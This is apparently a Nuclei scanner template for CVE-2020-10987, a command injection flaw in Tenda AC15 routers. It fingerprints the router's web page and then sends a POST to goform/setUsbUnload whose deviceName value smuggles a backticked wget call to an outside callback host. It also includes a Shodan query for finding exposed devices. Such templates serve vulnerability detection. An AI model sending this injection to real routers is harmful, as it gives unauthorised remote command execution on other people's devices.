漏洞描述
The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
id: CVE-2020-10987
info:
name: Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
author: pussycat0x
severity: critical
description: |
The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
reference:
- https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-10987
cwe-id: CWE-78
epss-score: 0.93961
epss-percentile: 0.99874
cpe: cpe:2.3:o:tenda:ac15_firmware:15.03.05.19:*:*:*:*:*:*:*
metadata:
shodan-query: http.title:"tenda wifi"
max-request: 2
vendor: tenda
product: ac15_firmware
tags: cve,cve2020,tenda,rce,kev,unauth,vkev,vuln
variables:
payload: "wget http://{{interactsh-url}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: dsl
dsl:
- 'contains(body,"<title>Tenda WiFi")'
- "contains(content_type, 'text/html')"
- "status_code == 200"
condition: and
internal: true
- raw:
- |
POST /goform/setUsbUnload HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: */*
deviceName=test`;{{payload}};`
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4b0a0048304602210092c5eef2726c5a3846ccf5cfbf33b29ce191fa0f0f486227a3c9f5cf2d47971e022100e01f35a1881275bd4adcc23d331c5361001d6ac166143c4cc98fb7c7ebaee6c8:922c64590222798bb761d5b6d8e72950